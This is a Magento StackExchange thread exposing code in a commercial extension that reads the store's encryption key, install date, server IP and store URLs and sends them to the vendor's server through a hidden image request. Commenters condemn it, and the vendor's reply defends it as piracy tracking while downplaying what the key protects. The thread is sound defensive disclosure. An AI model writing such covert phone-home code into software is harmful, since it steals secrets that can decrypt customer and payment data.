# Any good reason for a module to be accessing global/crypt/key remotely?

Tags: magento-1.9

Forgive my ignorance, but crypt key is used for decrypting Magento data, right? Is there any good reason for a module to access this? I stumbled across this code after installing Advanced Content Manager...

```
<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />
```

Comment: THIS. IS. HORRIBLE. There is no reason to leak your encryption key.

Comment: This is bad, very bad.

Comment: Nice catch! This is extremely bad ...

Comment: Thanks @Sander for telling us. It's been removed from Connect.

Comment: @benmarks glad to hear that. This is extremely disappointing for the obvious reasons as well as because the app has been extremely impressive and the developer has  been extremely helpful and quick in the past.

Comment: It's not really up to me, but this kind of exploit would get a vote for a permaban from me.

Comment: Bad enough they phone home, but they phone home with your key in *plaintext*.

Answer (score 11):

Yes...there is a good reason.
They want to know it and log it, just in case. :)

You should uninstall the extension (most probably you already did). You should never use extensions that "phone home", no matter what data they sends home.

You might want to list the extension here for others to see: [Funny / Useless / Horrible code from Magento Extensions](https://magento.meta.stackexchange.com/q/288/146)

Comment: "phoning home" unfortunately is done by a lot of modules. Amasty and Aheadworks do it as well :\

Comment: This https://gist.github.com/miguelbalparda/b57a47a010a5995bc44d can be used to check for global/crypt/key from CLI in all the folders excelt app/code/core.

Comment: So not only are they able to decrypt cc data (good thing I don't save it) passwords, etc..  But I paid $300 for them to have that ability.  That is what should be posted to Funny.

Comment: @iUseMagentoNow. This is funny "ooh", not funny "ha ha". You should ask for your money back.

Answer (score 8):

We got the support request about this feature today.
We already resolved it and remove this piece of code. A new release is available for all our customers in their customers area (for free, as we offer unlimited update).

I know we need to justify this, so let's do that:

- The goal of this tracker was ONLY to follow the non authorized use of our extension.
- The tracker was only displayed in the admin area (none of your customers or any one else than you and us has been able to see it).
- We removed this in our DB too.
- The key is only to encrypt your admin password. As we use to work with all of you by support requests, you may have already sent your credentials to us by email anyway, for support. If we wanted your password, we would directly sent it... It was not the goal.
- Even with the key, your password is still encrypted. And magento admin blocks user after some attemps.

We recognize that it is a mistake, and this is the strength of the community and open source system: we can fix and improve much faster.
Thank you all for having alerting us, we will make more effort on vulnerability now.

Comment: Non authorized use of the extension?! You can simply use the domain for that.